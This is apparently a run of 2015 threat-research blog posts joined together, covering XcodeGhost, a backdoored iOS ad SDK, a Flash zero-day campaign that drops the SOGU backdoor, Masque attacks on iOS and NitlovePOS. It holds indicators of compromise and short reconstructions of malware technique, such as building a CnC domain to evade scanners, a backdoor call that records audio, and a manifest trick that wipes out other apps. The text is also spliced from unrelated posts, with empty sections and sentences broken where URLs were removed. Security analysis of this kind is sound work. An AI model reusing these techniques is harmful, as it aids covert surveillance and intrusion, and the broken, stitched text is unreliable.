Although most vendors have already updated their apps on the App Store, this chart indicates many users are still actively using older, infected versions of various apps in the field. The version distribution varies among apps. For example, the infected versions of the most popular apps, 网易云音乐 (Music 163) and WeChat, are listed in Figure 4.

App Name | Incident Count (in 3 weeks)

Music 163 | ...

Figure 4: Sample infected app versions

The infected iPhones are running iOS versions from 6.x.x to 9.x.x, as illustrated in Figure 5. It is interesting to note that nearly 70% of the victims within our customer base remain on older iOS versions. We encourage them to update to the latest version, iOS 9, as quickly as possible.

Figure 5: Distribution of iOS versions running infected apps

Some enterprises have taken steps to block the XcodeGhost DNS query within their network to cut off the communication between employees’ iPhones and the attackers’ CnC servers to protect them from being hijacked. However, until these employees update their devices and apps, they are still vulnerable to potential hijacking of the XcodeGhost CnC traffic -- particularly when outside their corporate networks.

Given the number of infected devices detected within a short period among so many U.S. enterprises, we believe that XcodeGhost continues to be an ongoing threat for enterprises.

XcodeGhost Modified to Exploit iOS 9

We have worked with Apple to have all XcodeGhost and XcodeGhost S (described below) samples we have detected removed from the App Store.

XcodeGhost is planted in different versions of Xcode, including Xcode 7 (released for iOS 9 development). In the latest version, which we call XcodeGhost S, features have been added to infect iOS 9 and bypass static detection.

According to [1], Apple introduced the “NSAppTransportSecurity” approach for iOS 9 to improve client-server connection security. By default, only secure connections (https with specific ciphers) are allowed on iOS 9. Due to this limitation, previous versions of XcodeGhost would fail to connect with the CnC server by using http. However, Apple also allows developers to add exceptions (“NSAllowsArbitraryLoads”) in the app’s Info.plist to allow http connection. As shown in Figure 6, the XcodeGhost S sample reads the setting of “NSAllowsArbitraryLoads” under the “NSAppTransportSecurity” entry in the app’s Info.plist and picks different CnC servers (http/https) based on this setting.

Figure 6: iOS 9 adoption in XcodeGhost S
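The plist-driven CnC selection that Figure 6 illustrates can be sketched as follows. The key names (NSAppTransportSecurity, NSAllowsArbitraryLoads) are Apple's real Info.plist keys; the selection function itself is our reconstruction of the malware's logic, not its actual code:

```python
import plistlib

def pick_cnc_scheme(info_plist_bytes):
    # XcodeGhost S reads NSAllowsArbitraryLoads under NSAppTransportSecurity
    # in the app's Info.plist. If the app has opted out of ATS, plain http
    # callbacks still work; otherwise only an https CnC endpoint would
    # connect under iOS 9's default policy.
    info = plistlib.loads(info_plist_bytes)
    ats = info.get("NSAppTransportSecurity", {})
    return "http" if ats.get("NSAllowsArbitraryLoads") else "https"

# Minimal Info.plist contents built in memory for demonstration.
opted_out = plistlib.dumps({"NSAppTransportSecurity": {"NSAllowsArbitraryLoads": True}})
default_ats = plistlib.dumps({"CFBundleName": "Demo"})
print(pick_cnc_scheme(opted_out), pick_cnc_scheme(default_ats))  # http https
```

Note how the malware piggybacks on a configuration the host developer set for legitimate reasons: the more permissive the app's ATS exceptions, the more connection options the implant has.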

Further, in XcodeGhost S the CnC domain strings are concatenated character by character to bypass static detection; this behavior is shown in Figure 7.

Figure 7: Construct the CnC domain character by character
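The technique is trivial to reproduce. In this Python sketch, "example.com" is a placeholder, not the actual XcodeGhost S domain (which is not reproduced here):

```python
def build_domain():
    # Assemble the CnC domain one character at a time, so the full domain
    # never appears as a contiguous string in the compiled binary. In the
    # real malware each append is a separate instruction, defeating a
    # scanner that greps the binary for the literal domain.
    domain = ""
    for ch in ("e", "x", "a", "m", "p", "l", "e", ".", "c", "o", "m"):
        domain += ch
    return domain

print(build_domain())  # example.com
```

Signature-based scanners that match on string constants see only isolated single characters; detecting this pattern requires emulation or dynamic analysis, which is how the FireEye platform caught it.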

The FireEye iOS dynamic analysis platform successfully detected an app (“自由邦”) [2] infected by XcodeGhost S; the app has since been taken down from the App Store in cooperation with Apple. It is a shopping app for travelers, available in both the U.S. and Chinese App Stores. As shown in Figure 8, the infected app’s version is 2.6.6, updated on Sep. 15.

Figure 8: An App Store app is infected with XcodeGhost S

Enterprise Protection

FireEye MTP has detected and assisted in Apple’s takedown of thousands of XcodeGhost-infected iOS applications. We advise all organizations to notify their employees of the threat of XcodeGhost and other malicious iOS apps. Employees should make sure that they update all apps to the latest version. For the apps Apple has removed, users should delete them and switch to uninfected alternatives on the App Store.

FireEye MTP management customers have full visibility into which mobile devices are infected in their deployment base. We recommend that customers immediately review MTP alerts, locate infected devices/users, and quarantine the devices until the infected apps are removed. FireEye NX customers are advised to immediately review alert logs for activities related to XcodeGhost communications.


iBackDoor: High-risk Code Sneaks into the App Store

The affected ad library embeds backdoors in unsuspecting apps that use it to display ads, exposing sensitive data and functionality. The backdoors can be controlled remotely by loading JavaScript code from remote servers to perform the following actions:

  • Capture audio and screenshots.
  • Monitor and upload device location.
  • Read/delete/create/modify files in the app’s data container.
  • Read/Write/Reset the app’s keychain (e.g., app password storage).
  • Post encrypted data to remote servers.
  • Open URL schemes to identify and launch other apps installed on the device.
  • “Side-load” non-App Store apps by prompting the user to click an “Install” button.

The offending ad library contains identifying data suggesting that it is a version of the mobiSage SDK [1]. We found 17 distinct versions of the backdoored ad library, with version codes between 5.3.3 and 6.4.4. However, in the latest mobiSage SDK publicly released by adSage [2], identified as version 7.0.5, the backdoors are not present. We cannot determine with certainty whether the backdoored versions of the library were actually released by adSage, or whether they were created and/or compromised by a third party.

As of publication of this blog, we have identified 2,846 apps published in the App Store containing backdoored versions of the mobiSage SDK. Among these apps, we have observed over 900 attempts to contact their command and control (C2) server. We have notified Apple and provided the details to them.

These backdoors can be controlled not only by the original creators of the ad library, but potentially also by outside threat actors. While we have not observed commands from the C2 server intended to trigger the most sensitive capabilities, such as recording audio or stealing sensitive data, there are several ways that the backdoors could be abused by third-party targeted attackers to further compromise the security and privacy of the device and user:

  • An attacker could reverse-engineer the insecure HTTP-based control protocol between the ad library and its server, and then hijack the connection to insert commands to trigger the backdoors and steal sensitive information.
  • A malicious app developer can similarly inject commands, utilizing the library’s backdoors to build their own surveillance app. Since the ad library has passed the App Store review process in numerous apps, this is an attractive way to create an app with these hidden behaviors that will pass under Apple’s radar.

App Store Protections Ineffective

Despite Apple’s reputation for keeping malware out of the App Store with its strict review process, this case demonstrates that it is still possible for dangerous code that exposes users to critical security and privacy risks to sneak into the App Store by piggybacking on unsuspecting apps. Backdoors that enable silently recording audio and uploading sensitive data when triggered by downloaded code clearly violate the requirements of the iOS Developer Program [3]. The requirements state that apps are not permitted to download code or scripts, with the exception of scripts that “do not change the primary purpose of the Application by providing features or functionality that are inconsistent with the intended and advertised purpose of the Application as submitted to the App Store.” And, for apps that can record audio, “a reasonably conspicuous audio, visual or other indicator must be displayed to the user as part of the Application to indicate that a Recording is taking place.”  The backdoored versions of mobiSage clearly violate these requirements, yet thousands of affected apps made it past the App Store review process.

Technical Details

As shown in Figure 1, the backdoored mobiSage library includes two key components, separately implemented in Objective-C and JavaScript. The Objective-C component, which we refer to as msageCore, implements the underlying functionality of the backdoors and exposes interfaces to the JavaScript context through a WebView. The JavaScript component, which we refer to as msageJS, provides high-level execution logic and can trigger the backdoors by invoking the interfaces exposed by msageCore. Each component has its own separate version number.


Figure 1: Key components of backdoored mobiSage SDK

In the remainder of this section, we reveal internal details of msageCore, including its communication channel and high-risk interfaces. Then, we describe how msageJS is launched and updated, and how it can trigger the backdoors.

Backdoors in msageCore

Communication channel

MsageCore implements a general framework to communicate with msageJS via the ad library’s WebView. Commands and parameters are passed via specially crafted URLs in the format  adsagejs://cmd&parameter. As shown in the reconstructed code fragment in Figure 2, msageCore fetches the command and parameters from the JavaScript context and inserts them in its command queue.



Figure 2: Communication via URL loading in WebView.

To process a command in its queue, msageCore dispatches the command along with its parameters to a corresponding Objective-C class and method. Figure 3 shows portions of the reconstructed command dispatching code.



Figure 3: Command dispatch in msageCore.

High-risk interfaces

Each dispatched command ultimately arrives at an Objective-C class in msageCore. Table 1 shows a subset of msageCore classes and the corresponding interfaces that they expose.

  • captureAudio:, captureImage:, openMail:, openSMS:, openApp:, openInAppStore:, openCamera:, openImagePicker:, ...

  • start:, stop:, setTimer:, returnLocationInfo:webViewId:, ...

  • createDir, deleteDir:, deleteFile:, createFile:, getFileContent:, ...

  • writeKeyValue:, readValueByKey:, resetValueByKey:

  • sendHttpGet:, sendHttpPost:, sendHttpUpload:, ...

  • MD5Encrypt:, SHA1Encrypt:, AESEncrypt:, AESDecrypt:, DESEncrypt:, DESDecrypt:, XOREncrypt:, XORDecrypt:, RC4Encrypt:, RC4Decrypt, ...

Table 1: Selected interfaces exposed by msageCore

The selected interfaces reveal some of the key capabilities exposed by the backdoors in the library. They expose the ability to capture audio and screenshots while the affected app is in use, identify and launch other apps installed on the device, periodically monitor location, read and write files in the app’s data container, and read/write/reset “secure” keychain items stored by the app. Additionally, any data collected via these interfaces can be encrypted with various encryption schemes and uploaded to a remote server.


Beyond the selected interfaces, the ad library exposes users to additional risks by including explicit logic to promote and install “enpublic” apps shown in Figure 4. As we have highlighted in previous blogs [4, 5, 6, 7, 8], enpublic apps can introduce additional security risks by using private APIs, which would normally cause an app to be blocked by the App Store review process. In previous blogs we have described a number of “Masque” attacks utilizing enpublic apps [5, 6, 7], which affect pre-iOS 9 devices. The attacks include background monitoring of SMS or phone calls, breaking the app sandbox, stealing email messages, and demolishing arbitrary app installations.



Figure 4: Installing “enpublic” apps to bypass Apple App Store review


We can observe the functionality of the ad library by examining the implementations of some of the selected interfaces. Figure 5 shows reconstructed code snippets for capturing audio. Before storing recorded audio to a file audio_xxx.wav, the code retrieves two parameters from the command for recording duration and threshold.



Figure 5: Capturing audio with duration and threshold.


Figure 6 shows a code snippet for initializing the app’s keychain before reading. The accessed keychain is in the kSecClassGenericPassword class, which is widely used by apps for storing secret credentials such as passwords.



Figure 6: Reading the keychain in the kSecClassGenericPassword class.

Remote control in msageJS

msageJS contains JavaScript code for communicating with a C2 server and submitting commands to msageCore. The file layout of msageJS is shown in Figure 7. Inside sdkjs.js, we find a wrapper object called adsage and the JavaScript interface for command execution.



Figure 7: The file layout of msageJS


The command execution interface is constructed as follows:


          adsage.exec(className, methodName, argsList, onSuccess, onFailure);


The className and methodName parameters correspond to classes and methods in msageCore. The argsList parameter can be either a list or dict, and the exact types and values can be determined by reversing the methods in msageCore. The final two parameters are function callbacks invoked when the method exits. For example, the following invocation starts audio capture:


adsage.exec("MSageCoreUIManager", "captureAudio", ["Hey", 10, 40],  onSuccess, onFailure);


Note that the files comprising msageJS cannot be found by simply listing the files in an affected app’s IPA. The files themselves are zipped and encoded in Base64 in the data section of the ad library binary. After an affected app is launched, msageCore first decodes the string and extracts msageJS to the app’s data container, setting index.html shown in Figure 7 as the landing page in the ad library WebView to launch msageJS.



Figure 8: Base64 encoded JavaScript component in zip format.


When msageJS is launched, it sends a POST request to hxxp:// to check for updates. The server responds with information about the latest msageJS version, including a download URL, as shown in Figure 9. Note that since the request uses HTTP rather than HTTPS, the response can be hijacked easily by a network attacker, who could replace the download URL with a link to malicious JavaScript code that triggers the backdoors.


Figure 9: Server response to msageJS update request via HTTP POST


In this blog, we described a high-risk ad library affecting thousands of iOS apps in the Apple App Store. We revealed the internals of backdoors which can be used to silently record audio, capture screenshots, prompt the user to side-load other high-risk apps, and read sensitive data from the app’s keychain, among other dubious capabilities. We also showed how these backdoors can be controlled remotely by JavaScript code fetched from the Internet in an insecure manner.


FireEye Protection

Immediately after we discovered the high-risk ad library and affected apps, FireEye updated detection rules in its NX and Mobile Threat Prevention (MTP) products to detect the affected apps and their network activities. In addition, FireEye customers can access the full list of affected apps upon request.

FireEye NX customers are alerted if an employee uses an infected app while their iOS device is connected to the corporate network. It is important to note that, even if the servers that the backdoored mobiSage SDK communicates with do not deliver JavaScript code that triggers the high-risk backdoors, the affected apps still try to connect to them using HTTP. This HTTP session is vulnerable to hijacking by outside attackers.

FireEye MTP management customers have full visibility into high-risk apps installed on mobile devices in their deployment base. End users receive on-device notifications of the detection and IT administrators receive email alerts.

Click here to learn more about FireEye Mobile Threat Protection product.















2015 FLARE-ON Challenge Solutions

The first few challenges narrowed the playing field drastically, with most serious contestants holding firm through challenges 4-9. The last two increased the difficulty and made for a challenging final stretch before a well-earned finish line.

The FLARE On Challenge always reaches a very wide international audience. Outside of the USA, this year’s country with the most finishers was China, with an impressive 11 winners. I hope that massive shipment of belt buckles doesn’t get caught up in customs! The performance of contestants from Vietnam and Slovakia was also particularly commendable, as both countries held early leads in total finishers. Based on the locations we are sending the challenge prizes to (people who responded with their shipping info by noon today), we can say that 33 countries had finishers this year. The next graph shows the total winners by country this year.

And without further ado, here are the solutions for this year’s challenges, each written by their respective challenge creator.












We hope you had fun and learned something new about reverse engineering! Stay tuned for the third FLARE On Challenge coming in 2016!

Second Adobe Flash Zero-Day CVE-2015-5122 from HackingTeam Exploited in Strategic Web Compromise Targeting Japanese Victims

On July 14, FireEye researchers discovered attacks exploiting the Adobe Flash vulnerability CVE-2015-5122, just four days after Adobe released a patch. CVE-2015-5122 was the second Adobe Flash zero-day revealed in the leak of HackingTeam’s internal data. The campaign targeted Japanese organizations by using at least two legitimate Japanese websites to host a strategic web compromise (SWC), where victims ultimately downloaded a variant of the SOGU malware.

Strategic Web Compromise

At least two different Japanese websites were compromised to host the exploit framework and malicious downloads:

  • Japan’s International Hospitality and Conference Service Association (IHCSA) website (hxxp://www.ihcsa[.]or[.]jp) in Figure 1

    Figure 1: IHCSA website

  • Japan’s Cosmetech Inc. website (hxxp://cosmetech[.]co[.]jp)

The main landing page for the attacks is a specific URL seeded on the IHCSA website (hxxp://www.ihcsa[.]or[.]jp/zaigaikoukan/zaigaikoukansencho-1/), from which users are redirected to the HackingTeam Adobe Flash framework hosted on the second compromised Japanese website. In the past week, we observed this same basic framework across several different SWCs exploiting the “older” CVE-2015-5119 Adobe Flash vulnerability, as shown in Figure 2.

    Figure 2: First portion of exploit chain

The webpage (hxxp://cosmetech[.]co[.]jp/css/movie.html) is built with the open source framework Adobe Flex and checks whether the user has at least Adobe Flash Player version 11.4.0 installed. If the victim has the correct version of Flash, the user is directed to run a different, more in-depth profiling script (hxxp://, which checks several more conditions in addition to the Flash version. If the conditions are not met, the script will not attempt to load the Adobe Flash (SWF) file into the user’s browser. In at least two of the incidents we observed, the victims were running Internet Explorer 11 on Windows 7 machines.
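The version gate itself is simple. The following Python sketch shows the comparison logic the profiling stage applies; since the actual script is not reproduced in this post, this is an inferred illustration, not the attackers’ code:

```python
# Sketch of a "minimum Flash version" gate (inferred behavior, not the
# attackers' actual script, which was written for the browser).
def meets_minimum(version: str, minimum=(11, 4, 0)) -> bool:
    """Return True if a dotted version string is at least `minimum`."""
    parts = [int(x) for x in version.split(".")]
    parts += [0] * (3 - len(parts))   # pad short strings like "11.4"
    return tuple(parts[:3]) >= minimum

print(meets_minimum("18.0.0"))    # True  -> victim is profiled further
print(meets_minimum("11.3.300"))  # False -> exploit chain stops
```

Gating on version and environment like this keeps the SWF exploit away from incompatible or instrumented hosts, which also frustrates analysis.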

The final component is the delivery of a malicious SWF file, which we confirmed exploits CVE-2015-5122 in Adobe Flash Player for Windows (Figure 3).

    Figure 3: Malicious SWF download

SOGU Malware, Possible New Variant

After successful exploitation, the SWF file dropped a SOGU variant (a backdoor widely used by Chinese threat groups, also known as “Kaba”) in a temporary directory under “AppData\Local\”. The dropped file has the properties and configuration shown in Figure 4.

    Filename: Rdws.exe

    Size: 413696 bytes

    MD5: 5a22e5aee4da2fe363b77f1351265a00

    Compile Time: 2015-07-13 08:11:01

    SHA256: df5f1b802d553cddd3b99d1901a87d0d1f42431b366cfb0ed25f465285e38d27


    Import Hash: ae984e4ab41d192d631d4f923d9210e4

    PEHash: 57e6b26eac0f34714252957d26287bc93ef07db2

    .text: e683e1f9fb674f97cf4420d15dc09a2b

    .rdata: 3a92b98a74d7ffb095fe70cf8acacc75

    .data: b5d4f68badfd6e3454f8ad29da54481f

    .rsrc: 474f9723420a3f2d0512b99932a50ca7

    C2 Password: gogogod<

    Memo: 201507122359

    Process Inject Targets: %windir%\system32\svchost.exe

    Sogu Config Encoder: sogu_20140307

    Mutex Name: ZucFCoeHa8KvZcj1FO838HN&*wz4xSdmm1

    Figure 4: SOGU Binary ‘Rdws.exe’

The compile timestamp indicates the malware was assembled on July 13, less than a day before we observed the SWC. We believe the timestamp in this case is likely genuine, based on the timeline of the incident. The SOGU binary also appears to masquerade as a legitimate Trend Micro file named “VizorHtmlDialog.exe” (Figure 5).

    LegalCopyright: Copyright (C) 2009-2010 Trend Micro Incorporated. All rights reserved.

    InternalName: VizorHtmlDialog


    CompanyName: Trend Micro Inc.

    PrivateBuild: Build 1303 - 8/8/2010

    LegalTrademarks: Trend Micro Titanium is a registered trademark of Trend Micro Incorporated.


    ProductName: Trend Micro Titanium

    SpecialBuild: 1303

    ProductVersion: 3.0

    FileDescription: Trend Titanium

    OriginalFilename: VizorHtmlDialog.exe

    Figure 5: Rdws.exe version information

The threat group likely used Trend Micro, a security software company headquartered in Japan, as the basis for the fake file version information deliberately, given the focus of this campaign on Japanese organizations.

SOGU Command and Control

The SOGU variant calls out to a previously unobserved command and control (CnC) domain, “amxil[.]opmuert[.]org”, over port 443 (Figure 6). It uses modified DNS TXT record beaconing with an encoding we have not previously observed in SOGU malware, along with a non-standard header, indicating that this is possibly a new variant.

    Figure 6: SOGU C2 beaconing

The WHOIS registrant email address for the domain did not indicate any prior malicious activity, and the current IP resolution ( is for an Amazon Web Services IP address.
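For defenders, the CnC domain is the most actionable indicator from this section. A minimal hunting sketch over DNS or proxy logs follows; the log format and the plain-text form of the defanged domain are assumptions for illustration:

```python
# Match DNS query names against the CnC domain observed in this campaign
# (defanged in the text as amxil[.]opmuert[.]org). The surrounding log
# pipeline is assumed; only the matching logic is shown.
IOC_DOMAINS = {"amxil.opmuert.org"}

def flag_query(qname: str) -> bool:
    """True if a query name is an IOC domain or a subdomain of one."""
    qname = qname.rstrip(".").lower()
    return qname in IOC_DOMAINS or any(
        qname.endswith("." + d) for d in IOC_DOMAINS
    )

print(flag_query("amxil.opmuert.org."))  # True
print(flag_query("example.org"))         # False
```

Matching on the parent domain (rather than a single hostname) also catches new subdomains the operators might rotate to on the same infrastructure.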

Another Quick Turnaround on Leveraging HackingTeam Zero-Days

Similar to the short turnaround time highlighted in our blog on the recent APT3/APT18 phishing attacks, the threat actor quickly incorporated the leaked zero-day vulnerability into a SWC campaign. The threat group appears to have used procured and compromised infrastructure to target Japanese organizations. Within two days, we observed at least two victims related to this attack.

We cannot confirm how the organizations were targeted, though similar incidents involving SWC and exploitation of the Flash vulnerability CVE-2015-5119 lured victims with phishing emails. Additionally, the limited popularity of the niche site also contributes to our suspicion that phishing emails may have been the lure, and not incidental web browsing.

Malware Overlap with Other Chinese Threat Groups

We believe that this is a concerted campaign against Japanese companies given the nature of the SWC. The use of SOGU malware and dissemination method is consistent with the tactics of Chinese APT groups that we track. Chinese APT groups have previously targeted the affected Japanese organizations, but we have yet to confirm which group is responsible for this campaign.

Why Japan?

In this case, we do not have enough information to discern specifically what the threat actors may have been pursuing. The Japanese economy’s technological innovation and strengths in high-tech and precision goods have attracted the interest of multiple Chinese APT groups, who almost certainly view Japanese companies as a rich source of intellectual property and competitive intelligence. The Japanese government and military organizations are also frequent targets of cyber espionage.[1]  Japan’s economic influence, alliance with the United States, regional disputes, and evolving defense policies make the Japanese government a dedicated target of foreign intelligence.


FireEye maintains endpoint and network detection for CVE-2015-5122 and the backdoor used in this campaign. FireEye products and services identify this activity as SOGU/Kaba within the user interface. Additionally, we highly recommend:

  • Applying Adobe’s newest patch for Flash immediately;
  • Querying for additional activity by the indicators from the compromised Japanese websites and the SOGU malware callbacks;
  • Blocking CnC addresses via outbound communications; and
  • Scoping the environment to prepare for incident response.


    [1] Humber, Yuriy and Gearoid Reidy. “Yahoo Hacks Highlight Cyber Flaws Japan Rushing to Thwart.” BloombergBusiness. 8 July 2014.

    Japanese Ministry of Defense. “Trends Concerning Cyber Space.” Defense of Japan 2014.

    LAC Corporation. “Cyber Grid View, Vol. 1.”

    Otake, Tomoko. “Japan Pension Service hack used classic attack method.” Japan Times. 2 June 2015.


Three New Masque Attacks against iOS: Demolishing, Breaking and Hijacking

In the recent release of iOS 8.4, Apple fixed several vulnerabilities, including vulnerabilities that allow attackers to deploy two new kinds of Masque Attack (CVE-2015-3722 and CVE-2015-3725). We call these exploits Manifest Masque and Extension Masque; they can be used to demolish apps, including system apps (e.g., Apple Watch, Health, Pay and so on), and to break the app data container. In this blog, we also disclose the details of a previously fixed, but undisclosed, Masque vulnerability: Plugin Masque, which bypasses iOS entitlement enforcement and hijacks VPN traffic. Our investigation also shows that around one third of iOS devices still have not updated to version 8.1.3 or above, even five months after the release of 8.1.3, and these devices are still vulnerable to all of the Masque Attacks.

We have disclosed five kinds of Masque Attacks, as shown in the following table.


App Masque

* Replace an existing app

* Harvest sensitive data

Mitigation status: Fixed in iOS 8.1.3 [6]

URL Masque

* Bypass prompt of trust

* Hijack inter-app communication

Mitigation status: Partially fixed in iOS 8.1.3 [11]

Manifest Masque

* Demolish other apps (incl. Apple Watch, Health, Pay, etc.) during over-the-air installations

Mitigation status: Partially fixed in iOS 8.4

Plugin Masque

* Bypass prompt of trust

* Bypass VPN plugin entitlement

* Replace an existing VPN plugin

* Hijack device traffic

* Prevent device from rebooting

* Exploit more kernel vulnerabilities

Mitigation status: Fixed in iOS 8.1.3

Extension Masque

* Access another app’s data

* Or prevent another app from accessing its own data

Mitigation status: Partially fixed in iOS 8.4

Manifest Masque Attack leverages the CVE-2015-3722/3725 vulnerability to demolish an existing app on iOS when a victim installs an in-house iOS app wirelessly using enterprise provisioning from a website. The demolished app (the attack target) can be either a regular app downloaded from the official App Store or even an important system app, such as Apple Watch, Apple Pay, App Store, Safari, Settings, etc. This vulnerability affects all iOS 7.x and iOS 8.x versions prior to iOS 8.4. We first notified Apple of this vulnerability in August 2014.

Extension Masque Attack can break the restrictions of the app data container. A malicious app extension installed along with an in-house app on iOS 8 can either gain full access to a targeted app’s data container or prevent the targeted app from accessing its own data container. On June 14, security researchers Luyi, Xiaofeng et al. disclosed several severe issues on OS X, including an issue similar to this one [5]. They did remarkable research, but happened to miss this on iOS; their report claimed that “this security risk is not present on iOS”. However, the data container issue does affect all iOS 8.x versions prior to iOS 8.4, and can be leveraged by an attacker to steal all data in a target app’s data container. We independently discovered this vulnerability on iOS and notified Apple before the report [5] was published, and Apple fixed this issue as part of CVE-2015-3725.

In addition to these two vulnerabilities patched in iOS 8.4, we also disclose the details of another untrusted code injection attack that works by replacing the VPN plugin: the Plugin Masque Attack. We reported this vulnerability to Apple in November 2014, and Apple fixed it in iOS 8.1.3 when it patched the original Masque Attack (App Masque) [6, 11]. However, this exploit is even more severe than the original Masque Attack. The malicious code can be injected into the neagent process and can perform privileged operations, such as monitoring all VPN traffic, without the user’s awareness. We first demonstrated this attack at the Jailbreak Security Summit [7] in April 2015. Here we categorize this attack as the Plugin Masque Attack.

We will discuss the technical details and demonstrate these three kinds of Masque Attacks.

Manifest Masque: Putting On the New, Taking Off the Old

To distribute an in-house iOS app with enterprise provisioning wirelessly, one has to publish a web page containing a hyperlink that redirects to an XML manifest file hosted on an HTTPS server [1]. The XML manifest file contains metadata of the in-house app, including its bundle identifier, bundle version and the download URL of the .ipa file, as shown in Table 1. When installing the in-house iOS app wirelessly, iOS downloads this manifest file first and parses the metadata for the installation process.

<a href="itms-services://?action=downloadmanifest&url= plist">Install App</a>

    [manifest XML not reproduced]

              … Entries For Another App

Table 1. An example of the hyperlink and the manifest file

According to Apple’s official documentation [1], the bundle-identifier field should be “Your app’s bundle identifier, exactly as specified in your Xcode project”. However, we have discovered that iOS doesn’t verify consistency between the bundle identifier in the XML manifest file on the website and the bundle identifier within the app itself. If the XML manifest file on the website has a bundle identifier equivalent to that of another genuine app on the device, and the bundle-version in the manifest is higher than the genuine app’s version, the genuine app will be demolished down to a dummy placeholder, whereas the in-house app will still be installed using its built-in bundle id. The dummy placeholder will disappear after the victim restarts the device. Also, as shown in Table 1, a manifest file can contain metadata entries for multiple apps to distribute them at once, which means this vulnerability can cause multiple apps to be demolished with just one click by the victim.
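For reference, a wireless-install manifest has roughly the following shape. This sketch follows Apple’s documented enterprise-distribution format; the bundle identifier, version, URL and title below are placeholders, not values observed in any attack:

```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN"
  "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
  <key>items</key>
  <array>
    <dict>
      <key>assets</key>
      <array>
        <dict>
          <key>kind</key>
          <string>software-package</string>
          <key>url</key>
          <string>https://example.com/app.ipa</string>
        </dict>
      </array>
      <key>metadata</key>
      <dict>
        <key>bundle-identifier</key>
        <string>com.example.placeholder</string>
        <key>bundle-version</key>
        <string>9.9</string>
        <key>kind</key>
        <string>software</string>
        <key>title</key>
        <string>Example App</string>
      </dict>
    </dict>
  </array>
</dict>
</plist>
```

The attack described above hinges on the bundle-identifier and bundle-version keys in this metadata block: iOS trusts them for the installation bookkeeping without checking them against the .ipa being installed.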

By leveraging this vulnerability, one app developer can install his/her own app and demolish other apps (e.g. a competitor’s app) at the same time. In this way, attackers can perform DoS attacks or phishing attacks on iOS.

Figure 1. Phishing Attack by installing “malicious Chrome” and demolishing the genuine one

Figure 1 shows an example of the phishing attack. When the user clicks a URL in the Gmail app, this URL is rewritten with the “googlechrome-x-callback://” scheme and is supposed to be handled by Chrome on the device. However, an attacker can leverage the Manifest Masque vulnerability to demolish the genuine Chrome and install a “malicious Chrome” registering the same scheme. Unlike the original Masque Attack [xx], which requires the same bundle identifier to replace a genuine app, the malicious Chrome in this phishing attack uses a different bundle identifier to bypass the installer’s bundle identifier validation. Later, when the victim clicks a URL in the Gmail app, the malicious Chrome can take over the rewritten URL scheme and perform more sophisticated attacks.

What’s worse, an attacker can also exploit this vulnerability to demolish all system apps (e.g. Apple Watch, Apple Pay UIService, App Store, Safari, Health, InCallService, Settings, etc.). Once demolished, these system apps will no longer be available to the victim, even if the victim restarts the device.

Here we demonstrate this DoS attack on iOS 8.3 to demolish all the system apps and one App Store app (i.e. Gmail) when the victim clicks only once to install an in-house app wirelessly. Note that after rebooting the device, all the system apps still remain demolished while the App Store app would disappear since it has already been uninstalled.

Caching Out: The Value of Shimcache for Investigators

NitlovePOS: Another New POS Malware

There has been a proliferation of malware specifically designed to extract payment card information from Point-of-Sale (POS) systems over the last two years. In 2015, there have already been a variety of new POS malware identified including a new Alina variant, FighterPOS and Punkey. During our research into a widespread spam campaign, we discovered yet another POS malware that we’ve named NitlovePOS.

The NitlovePOS malware can capture and exfiltrate track 1 and track 2 payment card data by scanning the running processes of a compromised machine. It then sends this data to a webserver using SSL.

We believe the cybercriminals assess the hosts compromised via indiscriminate spam campaigns and instruct specific victims to download the POS malware.


We have been monitoring an indiscriminate spam campaign that started on Wednesday, May 20, 2015.  The spam emails referred to possible employment opportunities and purported to have a resume attached. The “From” email addresses were spoofed Yahoo! Mail accounts and contained the following “Subject” lines:

    Subject: Any Jobs?

    Subject: Any openings?

    Subject: Internship

    Subject: Internship questions

    Subject: Internships?

    Subject: Job Posting

    Subject: Job questions

    Subject: My Resume

    Subject: Openings?

The email came with an attachment named CV_[4 numbers].doc or My_Resume_[4 numbers].doc, which is embedded with a malicious macro. To trick the recipient into enabling the malicious macro, the document claims to be a “protected document.”
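The attachment naming convention is regular enough to triage mechanically. A simple Python sketch follows; the sample filename is invented to match the reported pattern:

```python
import re

# Attachment names reported for this campaign: CV_[4 numbers].doc or
# My_Resume_[4 numbers].doc. The test filename below is fabricated to
# match that pattern, not an observed sample.
ATTACHMENT_NAME = re.compile(r"^(?:CV|My_Resume)_\d{4}\.doc$")

def matches_campaign(filename: str) -> bool:
    return bool(ATTACHMENT_NAME.match(filename))

print(matches_campaign("My_Resume_4821.doc"))  # True
print(matches_campaign("resume.docx"))         # False
```

A filter like this is only a first-pass signal, of course; campaign operators change naming schemes cheaply, so it should supplement macro and payload analysis rather than replace it.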

If enabled, the malicious macro will download and execute a malicious executable from The cybercriminals behind this operation have been updating the payload. So far, we have observed:

    e6531d4c246ecf82a2fd959003d76cca  dro.exe

    600e5df303765ff73dccff1c3e37c03a  dro.exe

These payloads beacon to the same server from which they are downloaded and receive instructions to download additional malware hosted on this server. This server contains a wide variety of malware:

    6545d2528460884b24bf6d53b721bf9e  5dro.exe

    e339fce54e2ff6e9bd3a5c9fe6a214ea  AndroSpread.exe

    9e208e9d516f27fd95e8d165bd7911e8  AndroSpread.exe

    abc69e0d444536e41016754cfee3ff90  dr2o.exe

    e6531d4c246ecf82a2fd959003d76cca  dro.exe

    600e5df303765ff73dccff1c3e37c03a  dro.exe

    c8b0769eb21bb103b8fbda8ddaea2806  jews2.exe

    4d877072fd81b5b18c2c585f5a58a56e  load33.exe

    9c6398de0101e6b3811cf35de6fc7b79  load.exe

    ac8358ce51bbc7f7515e656316e23f8d  Pony.exe

    3309274e139157762b5708998d00cee0  Pony.exe

    b3962f61a4819593233aa5893421c4d1  pos.exe

    6cdd93dcb1c54a4e2b036d2e13b51216  pos.exe

We focused on the “pos.exe” malware and suspected that it may have targeted Point of Sale machines. We speculate that once the attackers have identified a potentially interesting host from among their victims, they can then instruct the victim to download the POS malware. While we have observed many downloads of the various EXEs hosted on that server, we have only observed three downloads of “pos.exe”.

Technical Analysis

We analyzed the “pos.exe” (6cdd93dcb1c54a4e2b036d2e13b51216) binary found on the server. (A new version of “pos.exe” (b3962f61a4819593233aa5893421c4d1) was uploaded on May 22, 2015 that has exactly the same malicious behavior but with different file structure.)

The binary itself is named “TAPIBrowser” and was created on May 20, 2015.

    File Name                       : pos.exe

    File Size                       : 141 kB

    MD5: 6cdd93dcb1c54a4e2b036d2e13b51216

    File Type                       : Win32 EXE

    Machine Type                    : Intel 386 or later, and compatibles

